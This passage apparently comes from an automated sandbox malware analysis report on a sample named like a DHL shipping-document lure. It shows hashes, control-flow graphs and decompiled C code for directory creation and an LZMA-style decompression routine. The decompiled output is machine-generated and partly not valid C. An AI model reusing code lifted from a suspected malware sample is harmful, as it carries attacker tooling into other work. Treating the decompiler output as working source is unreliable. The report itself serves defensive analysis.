                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%S.dll$UXTHEME$\
                        • API String ID: 2200240437-1946221925
                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                        • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                        C-Code - Quality: 100%
                        			E00405B99(WCHAR* _a4) {
                        				struct _SECURITY_ATTRIBUTES _v16;
                        				struct _SECURITY_DESCRIPTOR _v36;
                        				int _t22;
                        				long _t23;
                        
                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                        				_v36.Owner = 0x4083f8;
                        				_v36.Group = 0x4083f8;
                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                        				_v16.lpSecurityDescriptor =  &_v36;
                        				_v36.Revision = 1;
                        				_v36.Control = 4;
                        				_v36.Dacl = 0x4083e8;
                        				_v16.nLength = 0xc;
                        				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                        				if(_t22 != 0) {
                        					L1:
                        					return 0;
                        				}
                        				_t23 = GetLastError();
                        				if(_t23 == 0xb7) {
                        					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                        						goto L1;
                        					}
                        					return GetLastError();
                        				}
                        				return _t23;
                        			}








                        APIs
                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                        • GetLastError.KERNEL32 ref: 00405BF0
                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                        • GetLastError.KERNEL32 ref: 00405C0F
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 3449924974-3916508600
                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                        • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 538 406bb0-406bd3 539 406bd5-406bd8 538->539 540 406bdd-406be0 538->540 541 4075fd-407601 539->541 542 406be3-406bec 540->542 543 406bf2 542->543 544 4075fa 542->544 545 406bf9-406bfd 543->545 546 406d39-4073e0 543->546 547 406c9e-406ca2 543->547 548 406d0e-406d12 543->548 544->541 549 406c03-406c10 545->549 550 4075e5-4075f8 545->550 556 4073e2-4073f8 546->556 557 4073fa-407410 546->557 554 406ca8-406cc1 547->554 555 40754e-407558 547->555 551 406d18-406d2c 548->551 552 40755d-407567 548->552 549->544 558 406c16-406c5c 549->558 550->541 559 406d2f-406d37 551->559 552->550 560 406cc4-406cc8 554->560 555->550 561 407413-40741a 556->561 557->561 562 406c84-406c86 558->562 563 406c5e-406c62 558->563 559->546 559->548 560->547 564 406cca-406cd0 560->564 567 407441-40744d 561->567 568 40741c-407420 561->568 571 406c94-406c9c 562->571 572 406c88-406c92 562->572 569 406c64-406c67 GlobalFree 563->569 570 406c6d-406c7b GlobalAlloc 563->570 565 406cd2-406cd9 564->565 566 406cfa-406d0c 564->566 573 406ce4-406cf4 GlobalAlloc 565->573 574 406cdb-406cde GlobalFree 565->574 566->559 567->542 575 407426-40743e 568->575 576 4075cf-4075d9 568->576 569->570 570->544 578 406c81 570->578 571->560 572->571 572->572 573->544 573->566 574->573 575->567 576->550 578->562
                        C-Code - Quality: 98%
                        			E00406BB0(void* __ecx) {
                        				void* _v8;
                        				void* _v12;
                        				signed int _v16;
                        				unsigned int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _v84;
                        				signed int _v88;
                        				signed int _v92;
                        				signed int _v95;
                        				signed int _v96;
                        				signed int _v100;
                        				signed int _v104;
                        				signed int _v108;
                        				signed int _v112;
                        				signed int _v116;
                        				signed int _v120;
                        				intOrPtr _v124;
                        				signed int _v128;
                        				signed int _v132;
                        				signed int _v136;
                        				void _v140;
                        				void* _v148;
                        				signed int _t537;
                        				signed int _t538;
                        				signed int _t572;
                        
                        				_t572 = 0x22;
                        				_v148 = __ecx;
                        				memcpy( &_v140, __ecx, _t572 << 2);
                        				if(_v52 == 0xffffffff) {
                        					return 1;
                        				}
                        				while(1) {
                        					L3:
                        					_t537 = _v140;
                        					if(_t537 > 0x1c) {
                        						break;
                        					}
                        					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                        						case 0:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								goto L173;
                        							}
                        							_v112 = _v112 - 1;
                        							_v116 = _v116 + 1;
                        							_t537 =  *_v116;
                        							__eflags = _t537 - 0xe1;
                        							if(_t537 > 0xe1) {
                        								goto L174;
                        							}
                        							_t542 = _t537 & 0x000000ff;
                        							_push(0x2d);
                        							asm("cdq");
                        							_pop(_t576);
                        							_push(9);
                        							_pop(_t577);
                        							_t622 = _t542 / _t576;
                        							_t544 = _t542 % _t576 & 0x000000ff;
                        							asm("cdq");
                        							_t617 = _t544 % _t577 & 0x000000ff;
                        							_v64 = _t617;
                        							_v32 = (1 << _t622) - 1;
                        							_v28 = (1 << _t544 / _t577) - 1;
                        							_t625 = (0x300 << _t617 + _t622) + 0x736;
                        							__eflags = 0x600 - _v124;
                        							if(0x600 == _v124) {
                        								L12:
                        								__eflags = _t625;
                        								if(_t625 == 0) {
                        									L14:
                        									_v76 = _v76 & 0x00000000;
                        									_v68 = _v68 & 0x00000000;
                        									goto L17;
                        								} else {
                        									goto L13;
                        								}
                        								do {
                        									L13:
                        									_t625 = _t625 - 1;
                        									__eflags = _t625;
                        									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                        								} while (_t625 != 0);
                        								goto L14;
                        							}
                        							__eflags = _v8;
                        							if(_v8 != 0) {
                        								GlobalFree(_v8);
                        							}
                        							_t537 = GlobalAlloc(0x40, 0x600); // executed
                        							__eflags = _t537;
                        							_v8 = _t537;
                        							if(_t537 == 0) {
                        								goto L174;
                        							} else {
                        								_v124 = 0x600;
                        								goto L12;
                        							}
                        						case 1:
                        							L15:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 1;
                        								goto L173;
                        							}
                        							_v112 = _v112 - 1;
                        							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                        							_v116 = _v116 + 1;
                        							_t50 =  &_v76;
                        							 *_t50 = _v76 + 1;
                        							__eflags =  *_t50;
                        							L17:
                        							__eflags = _v76 - 4;
                        							if(_v76 < 4) {
                        								goto L15;
                        							}
                        							_t550 = _v68;
                        							__eflags = _t550 - _v120;
                        							if(_t550 == _v120) {
                        								L22:
                        								_v76 = 5;
                        								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                        								goto L25;
                        							}
                        							__eflags = _v12;
                        							_v120 = _t550;
                        							if(_v12 != 0) {
                        								GlobalFree(_v12);
                        							}
                        							_t537 = GlobalAlloc(0x40, _v68); // executed
                        							__eflags = _t537;
                        							_v12 = _t537;
                        							if(_t537 == 0) {
                        								goto L174;
                        							} else {
                        								goto L22;
                        							}
                        						case 2:
                        							L26:
                        							_t557 = _v100 & _v32;
                        							_v136 = 6;
                        							_v80 = _t557;
                        							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                        							goto L135;
                        						case 3:
                        							L23:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 3;
                        								goto L173;
                        							}
                        							_v112 = _v112 - 1;
                        							_t72 =  &_v116;
                        							 *_t72 = _v116 + 1;
                        							__eflags =  *_t72;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							L25:
                        							_v76 = _v76 - 1;
                        							__eflags = _v76;
                        							if(_v76 != 0) {
                        								goto L23;
                        							}
                        							goto L26;
                        						case 4:
                        							L136:
                        							_t559 =  *_t626;
                        							_t610 = _t559 & 0x0000ffff;
                        							_t591 = (_v20 >> 0xb) * _t610;
                        							__eflags = _v16 - _t591;
                        							if(_v16 >= _t591) {
                        								_v20 = _v20 - _t591;
                        								_v16 = _v16 - _t591;
                        								_v68 = 1;
                        								_t560 = _t559 - (_t559 >> 5);
                        								__eflags = _t560;
                        								 *_t626 = _t560;
                        							} else {
                        								_v20 = _t591;
                        								_v68 = _v68 & 0x00000000;
                        								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                        							}
                        							__eflags = _v20 - 0x1000000;
                        							if(_v20 >= 0x1000000) {
                        								goto L142;
                        							} else {
                        								goto L140;
                        							}
                        						case 5:
                        							L140:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 5;
                        								goto L173;
                        							}
                        							_v20 = _v20 << 8;
                        							_v112 = _v112 - 1;
                        							_t464 =  &_v116;
                        							 *_t464 = _v116 + 1;
                        							__eflags =  *_t464;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							L142:
                        							_t561 = _v136;
                        							goto L143;
                        						case 6:
                        							__edx = 0;
                        							__eflags = _v68;
                        							if(_v68 != 0) {
                        								__eax = _v8;
                        								__ecx = _v60;
                        								_v56 = 1;
                        								_v136 = 7;
                        								__esi = _v8 + 0x180 + _v60 * 2;
                        								goto L135;
                        							}
                        							__eax = _v96 & 0x000000ff;
                        							__esi = _v100;
                        							__cl = 8;
                        							__cl = 8 - _v64;
                        							__esi = _v100 & _v28;
                        							__eax = (_v96 & 0x000000ff) >> 8;
                        							__ecx = _v64;
                        							__esi = (_v100 & _v28) << 8;
                        							__ecx = _v8;
                        							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                        							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                        							__eflags = _v60 - 4;
                        							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                        							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                        							if(_v60 >= 4) {
                        								__eflags = _v60 - 0xa;
                        								if(_v60 >= 0xa) {
                        									_t103 =  &_v60;
                        									 *_t103 = _v60 - 6;
                        									__eflags =  *_t103;
                        								} else {
                        									_v60 = _v60 - 3;
                        								}
                        							} else {
                        								_v60 = 0;
                        							}
                        							__eflags = _v56 - __edx;
                        							if(_v56 == __edx) {
                        								__ebx = 0;
                        								__ebx = 1;
                        								goto L63;
                        							}
                        							__eax = _v24;
                        							__eax = _v24 - _v48;
                        							__eflags = __eax - _v120;
                        							if(__eax >= _v120) {
                        								__eax = __eax + _v120;
                        								__eflags = __eax;
                        							}
                        							__ecx = _v12;
                        							__ebx = 0;
                        							__ebx = 1;
                        							__al =  *((intOrPtr*)(__eax + __ecx));
                        							_v95 =  *((intOrPtr*)(__eax + __ecx));
                        							goto L43;
                        						case 7:
                        							__eflags = _v68 - 1;
                        							if(_v68 != 1) {
                        								__eax = _v40;
                        								_v132 = 0x16;
                        								_v36 = _v40;
                        								__eax = _v44;
                        								_v40 = _v44;
                        								__eax = _v48;
                        								_v44 = _v48;
                        								__eax = 0;
                        								__eflags = _v60 - 7;
                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        								__al = __al & 0x000000fd;
                        								__eax = (__eflags >= 0) - 1 + 0xa;
                        								_v60 = (__eflags >= 0) - 1 + 0xa;
                        								__eax = _v8;
                        								__eax = _v8 + 0x664;
                        								__eflags = __eax;
                        								_v92 = __eax;
                        								goto L71;
                        							}
                        							__eax = _v8;
                        							__ecx = _v60;
                        							_v136 = 8;
                        							__esi = _v8 + 0x198 + _v60 * 2;
                        							goto L135;
                        						case 8:
                        							__eflags = _v68;
                        							if(_v68 != 0) {
                        								__eax = _v8;
                        								__ecx = _v60;
                        								_v136 = 0xa;
                        								__esi = _v8 + 0x1b0 + _v60 * 2;
                        							} else {
                        								__eax = _v60;
                        								__ecx = _v8;
                        								__eax = _v60 + 0xf;
                        								_v136 = 9;
                        								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                        								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                        							}
                        							goto L135;
                        						case 9:
                        							__eflags = _v68;
                        							if(_v68 != 0) {
                        								goto L92;
                        							}
                        							__eflags = _v100;
                        							if(_v100 == 0) {
                        								goto L174;
                        							}
                        							__eax = 0;
                        							__eflags = _v60 - 7;
                        							_t264 = _v60 - 7 >= 0;
                        							__eflags = _t264;
                        							0 | _t264 = _t264 + _t264 + 9;
                        							_v60 = _t264 + _t264 + 9;
                        							goto L78;
                        						case 0xa:
                        							__eflags = _v68;
                        							if(_v68 != 0) {
                        								__eax = _v8;
                        								__ecx = _v60;
                        								_v136 = 0xb;
                        								__esi = _v8 + 0x1c8 + _v60 * 2;
                        								goto L135;
                        							}
                        							__eax = _v44;
                        							goto L91;
                        						case 0xb:
                        							__eflags = _v68;
                        							if(_v68 != 0) {
                        								__ecx = _v40;
                        								__eax = _v36;
                        								_v36 = _v40;
                        							} else {
                        								__eax = _v40;
                        							}
                        							__ecx = _v44;
                        							_v40 = _v44;
                        							L91:
                        							__ecx = _v48;
                        							_v48 = __eax;
                        							_v44 = _v48;
                        							L92:
                        							__eax = _v8;
                        							_v132 = 0x15;
                        							__eax = _v8 + 0xa68;
                        							_v92 = _v8 + 0xa68;
                        							goto L71;
                        						case 0xc:
                        							L102:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 0xc;
                        								goto L173;
                        							}
                        							__ecx = _v116;
                        							__eax = _v16;
                        							_v20 = _v20 << 8;
                        							__ecx =  *_v116 & 0x000000ff;
                        							_v112 = _v112 - 1;
                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							_t340 =  &_v116;
                        							 *_t340 = _v116 + 1;
                        							__eflags =  *_t340;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							__eax = _v48;
                        							goto L104;
                        						case 0xd:
                        							L39:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 0xd;
                        								goto L173;
                        							}
                        							__ecx = _v116;
                        							__eax = _v16;
                        							_v20 = _v20 << 8;
                        							__ecx =  *_v116 & 0x000000ff;
                        							_v112 = _v112 - 1;
                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							_t127 =  &_v116;
                        							 *_t127 = _v116 + 1;
                        							__eflags =  *_t127;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							L41:
                        							__eax = _v68;
                        							__eflags = _v76 - _v68;
                        							if(_v76 != _v68) {
                        								goto L50;
                        							}
                        							__eflags = __ebx - 0x100;
                        							if(__ebx >= 0x100) {
                        								goto L56;
                        							}
                        							L43:
                        							__eax = _v95 & 0x000000ff;
                        							_v95 = _v95 << 1;
                        							__ecx = _v92;
                        							__eax = (_v95 & 0x000000ff) >> 7;
                        							_v76 = __eax;
                        							__eax = __eax + 1;
                        							__eax = __eax << 8;
                        							__eax = __eax + __ebx;
                        							__esi = _v92 + __eax * 2;
                        							_v20 = _v20 >> 0xb;
                        							__ax =  *__esi;
                        							_v88 = __esi;
                        							__edx = __ax & 0x0000ffff;
                        							__ecx = (_v20 >> 0xb) * __edx;
                        							__eflags = _v16 - __ecx;
                        							if(_v16 >= __ecx) {
                        								_v20 = _v20 - __ecx;
                        								_v16 = _v16 - __ecx;
                        								__cx = __ax;
                        								_v68 = 1;
                        								__cx = __ax >> 5;
                        								__eflags = __eax;
                        								__ebx = __ebx + __ebx + 1;
                        								 *__esi = __ax;
                        							} else {
                        								_v68 = _v68 & 0x00000000;
                        								_v20 = __ecx;
                        								0x800 = 0x800 - __edx;
                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        								__ebx = __ebx + __ebx;
                        								 *__esi = __cx;
                        							}
                        							__eflags = _v20 - 0x1000000;
                        							_v72 = __ebx;
                        							if(_v20 >= 0x1000000) {
                        								goto L41;
                        							} else {
                        								goto L39;
                        							}
                        						case 0xe:
                        							L48:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 0xe;
                        								goto L173;
                        							}
                        							__ecx = _v116;
                        							__eax = _v16;
                        							_v20 = _v20 << 8;
                        							__ecx =  *_v116 & 0x000000ff;
                        							_v112 = _v112 - 1;
                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							_t161 =  &_v116;
                        							 *_t161 = _v116 + 1;
                        							__eflags =  *_t161;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							while(1) {
                        								L50:
                        								__eflags = __ebx - 0x100;
                        								if(__ebx >= 0x100) {
                        									break;
                        								}
                        								__eax = _v92;
                        								__edx = __ebx + __ebx;
                        								__ecx = _v20;
                        								__esi = __edx + __eax;
                        								__ecx = _v20 >> 0xb;
                        								__ax =  *__esi;
                        								_v88 = __esi;
                        								__edi = __ax & 0x0000ffff;
                        								__ecx = (_v20 >> 0xb) * __edi;
                        								__eflags = _v16 - __ecx;
                        								if(_v16 >= __ecx) {
                        									_v20 = _v20 - __ecx;
                        									_v16 = _v16 - __ecx;
                        									__cx = __ax;
                        									_t175 = __edx + 1; // 0x1
                        									__ebx = _t175;
                        									__cx = __ax >> 5;
                        									__eflags = __eax;
                        									 *__esi = __ax;
                        								} else {
                        									_v20 = __ecx;
                        									0x800 = 0x800 - __edi;
                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        									__ebx = __ebx + __ebx;
                        									 *__esi = __cx;
                        								}
                        								__eflags = _v20 - 0x1000000;
                        								_v72 = __ebx;
                        								if(_v20 >= 0x1000000) {
                        									continue;
                        								} else {
                        									goto L48;
                        								}
                        							}
                        							L56:
                        							_t178 =  &_v56;
                        							 *_t178 = _v56 & 0x00000000;
                        							__eflags =  *_t178;
                        							goto L57;
                        						case 0xf:
                        							L60:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 0xf;
                        								goto L173;
                        							}
                        							__ecx = _v116;
                        							__eax = _v16;
                        							_v20 = _v20 << 8;
                        							__ecx =  *_v116 & 0x000000ff;
                        							_v112 = _v112 - 1;
                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							_t208 =  &_v116;
                        							 *_t208 = _v116 + 1;
                        							__eflags =  *_t208;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							L62:
                        							__eflags = __ebx - 0x100;
                        							if(__ebx >= 0x100) {
                        								L57:
                        								__al = _v72;
                        								_v96 = _v72;
                        								goto L58;
                        							}
                        							L63:
                        							__eax = _v92;
                        							__edx = __ebx + __ebx;
                        							__ecx = _v20;
                        							__esi = __edx + __eax;
                        							__ecx = _v20 >> 0xb;
                        							__ax =  *__esi;
                        							_v88 = __esi;
                        							__edi = __ax & 0x0000ffff;
                        							__ecx = (_v20 >> 0xb) * __edi;
                        							__eflags = _v16 - __ecx;
                        							if(_v16 >= __ecx) {
                        								_v20 = _v20 - __ecx;
                        								_v16 = _v16 - __ecx;
                        								__cx = __ax;
                        								_t222 = __edx + 1; // 0x1
                        								__ebx = _t222;
                        								__cx = __ax >> 5;
                        								__eflags = __eax;
                        								 *__esi = __ax;
                        							} else {
                        								_v20 = __ecx;
                        								0x800 = 0x800 - __edi;
                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        								__ebx = __ebx + __ebx;
                        								 *__esi = __cx;
                        							}
                        							__eflags = _v20 - 0x1000000;
                        							_v72 = __ebx;
                        							if(_v20 >= 0x1000000) {
                        								goto L62;
                        							} else {
                        								goto L60;
                        							}
                        						case 0x10:
                        							L112:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 0x10;
                        								goto L173;
                        							}
                        							__ecx = _v116;
                        							__eax = _v16;
                        							_v20 = _v20 << 8;
                        							__ecx =  *_v116 & 0x000000ff;
                        							_v112 = _v112 - 1;
                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							_t371 =  &_v116;
                        							 *_t371 = _v116 + 1;
                        							__eflags =  *_t371;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							goto L114;
                        						case 0x11:
                        							L71:
                        							__esi = _v92;
                        							_v136 = 0x12;
                        							goto L135;
                        						case 0x12:
                        							__eflags = _v68;
                        							if(_v68 != 0) {
                        								__eax = _v92;
                        								_v136 = 0x13;
                        								__esi = _v92 + 2;
                        								L135:
                        								_v88 = _t626;
                        								goto L136;
                        							}
                        							__eax = _v80;
                        							_v52 = _v52 & 0x00000000;
                        							__ecx = _v92;
                        							__eax = _v80 << 4;
                        							__eflags = __eax;
                        							__eax = _v92 + __eax + 4;
                        							goto L133;
                        						case 0x13:
                        							__eflags = _v68;
                        							if(_v68 != 0) {
                        								_t475 =  &_v92;
                        								 *_t475 = _v92 + 0x204;
                        								__eflags =  *_t475;
                        								_v52 = 0x10;
                        								_v68 = 8;
                        								L147:
                        								_v128 = 0x14;
                        								goto L148;
                        							}
                        							__eax = _v80;
                        							__ecx = _v92;
                        							__eax = _v80 << 4;
                        							_v52 = 8;
                        							__eax = _v92 + (_v80 << 4) + 0x104;
                        							L133:
                        							_v92 = __eax;
                        							_v68 = 3;
                        							goto L147;
                        						case 0x14:
                        							_v52 = _v52 + __ebx;
                        							__eax = _v132;
                        							goto L143;
                        						case 0x15:
                        							__eax = 0;
                        							__eflags = _v60 - 7;
                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        							__al = __al & 0x000000fd;
                        							__eax = (__eflags >= 0) - 1 + 0xb;
                        							_v60 = (__eflags >= 0) - 1 + 0xb;
                        							goto L123;
                        						case 0x16:
                        							__eax = _v52;
                        							__eflags = __eax - 4;
                        							if(__eax >= 4) {
                        								_push(3);
                        								_pop(__eax);
                        							}
                        							__ecx = _v8;
                        							_v68 = 6;
                        							__eax = __eax << 7;
                        							_v128 = 0x19;
                        							_v92 = __eax;
                        							goto L148;
                        						case 0x17:
                        							L148:
                        							__eax = _v68;
                        							_v84 = 1;
                        							_v76 = _v68;
                        							goto L152;
                        						case 0x18:
                        							L149:
                        							__eflags = _v112;
                        							if(_v112 == 0) {
                        								_v140 = 0x18;
                        								goto L173;
                        							}
                        							__ecx = _v116;
                        							__eax = _v16;
                        							_v20 = _v20 << 8;
                        							__ecx =  *_v116 & 0x000000ff;
                        							_v112 = _v112 - 1;
                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							_t490 =  &_v116;
                        							 *_t490 = _v116 + 1;
                        							__eflags =  *_t490;
                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                        							L151:
                        							_t493 =  &_v76;
                        							 *_t493 = _v76 - 1;
                        							__eflags =  *_t493;
                        							L152:
                        							__eflags = _v76;
                        							if(_v76 <= 0) {
                        								__ecx = _v68;
                        								__ebx = _v84;
                        								0 = 1;
                        								__eax = 1 << __cl;
                        								__ebx = _v84 - (1 << __cl);
                        								__eax = _v128;
                        								_v72 = __ebx;
                        								L143:
                        								_v140 = _t561;
                        								goto L3;
                        							}
                        							__eax = _v84;
                        							_v20 = _v20 >> 0xb;
                        							__edx = _v84 + _v84;
                        							__eax = _v92;
                        							__esi = __edx + __eax;
                        							_v88 = __esi;
                        							__ax =  *__esi;
                        							__edi = __ax & 0x0000ffff;
                        							__ecx = (_v20 >> 0xb) * __edi;
                        							__eflags = _v16 - __ecx;
                        							if(_v16 >= __ecx) {
                        								_v20 = _v20 - __ecx;
                        								_v16 = _v16 - __ecx;
                        								__cx = __ax;
                        								__cx = __ax >> 5;
                        								__eax = __eax - __ecx;
                        								__edx = __edx + 1;
                        								__eflags = __edx;
                        								 *__esi = __ax;
                        								_v84 = __edx;
                        							} else {
                        								_v20 = __ecx;
                        								0x800 = 0x800 - __edi;
                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        								_v84 = _v84 << 1;
                        								 *__esi = __cx;
                        							}
                        							__eflags = _v20 - 0x1000000;
                        							if(_v20 >= 0x1000000) {
                        								goto L151;
                        							} else {
                        								goto L149;
                        							}
                        						case 0x19:
                        							__eflags = __ebx - 4;
                        							if(__ebx < 4) {
                        								_v48 = __ebx;
                        								L122:
                        								_t399 =  &_v48;
                        								 *_t399 = _v48 + 1;
                        								__eflags =  *_t399;
                        								L123:
                        								__eax = _v48;
                        								__eflags = __eax;
                        								if(__eax == 0) {
                        									_v52 = _v52 | 0xffffffff;
                        									goto L173;
                        								}
                        								__eflags = __eax - _v100;
                        								if(__eax > _v100) {
                        									goto L174;
                        								}
                        								_v52 = _v52 + 2;
                        								__eax = _v52;
                        								_t406 =  &_v100;
                        								 *_t406 = _v100 + _v52;
                        								__eflags =  *_t406;
                        								goto L126;
                        							}
                        							__ecx = __ebx;
                        							__eax = __ebx;
                        							__ecx = __ebx >> 1;
                        							__eax = __ebx & 0x00000001;
                        							__ecx = (__ebx >> 1) - 1;
                        							__al = __al | 0x00000002;
                        							__eax = (__ebx & 0x00000001) << __cl;
                        							__eflags = __ebx - 0xe;
                        							_v48 = __eax;
                        							if(__ebx >= 0xe) {
                        								__ebx = 0;
                        								_v76 = __ecx;
                        								L105:
                        								__eflags = _v76;
                        								if(_v76 <= 0) {
                        									__eax = __eax + __ebx;
                        									_v68 = 4;
                        									_v48 = __eax;
                        									__eax = _v8;
                        									__eax = _v8 + 0x644;
                        									__eflags = __eax;
                        									L111:
                        									__ebx = 0;
                        									_v92 = __eax;
                        									_v84 = 1;
                        									_v72 = 0;
                        									_v76 = 0;
                        									L115:
                        									__eax = _v68;
                        									__eflags = _v76 - _v68;
                        									if(_v76 >= _v68) {
                        										_t397 =  &_v48;
                        										 *_t397 = _v48 + __ebx;
                        										__eflags =  *_t397;
                        										goto L122;
                        									}
                        									__eax = _v84;
                        									_v20 = _v20 >> 0xb;
                        									__edi = _v84 + _v84;
                        									__eax = _v92;
                        									__esi = __edi + __eax;
                        									_v88 = __esi;
                        									__ax =  *__esi;
                        									__ecx = __ax & 0x0000ffff;
                        									__edx = (_v20 >> 0xb) * __ecx;
                        									__eflags = _v16 - __edx;
                        									if(_v16 >= __edx) {
                        										__ecx = 0;
                        										_v20 = _v20 - __edx;
                        										__ecx = 1;
                        										_v16 = _v16 - __edx;
                        										__ebx = 1;
                        										__ecx = _v76;
                        										__ebx = 1 << __cl;
                        										__ecx = 1 << __cl;
                        										__ebx = _v72;
                        										__ebx = _v72 | __ecx;
                        										__cx = __ax;
                        										__cx = __ax >> 5;
                        										__eax = __eax - __ecx;
                        										__edi = __edi + 1;
                        										__eflags = __edi;
                        										_v72 = __ebx;
                        										 *__esi = __ax;
                        										_v84 = __edi;
                        									} else {
                        										_v20 = __edx;
                        										0x800 = 0x800 - __ecx;
                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        										_v84 = _v84 << 1;
                        										 *__esi = __dx;
                        									}
                        									__eflags = _v20 - 0x1000000;
                        									if(_v20 >= 0x1000000) {
                        										L114:
                        										_t374 =  &_v76;
                        										 *_t374 = _v76 + 1;
                        										__eflags =  *_t374;
                        										goto L115;
                        									} else {
                        										goto L112;
                        									}
                        								}
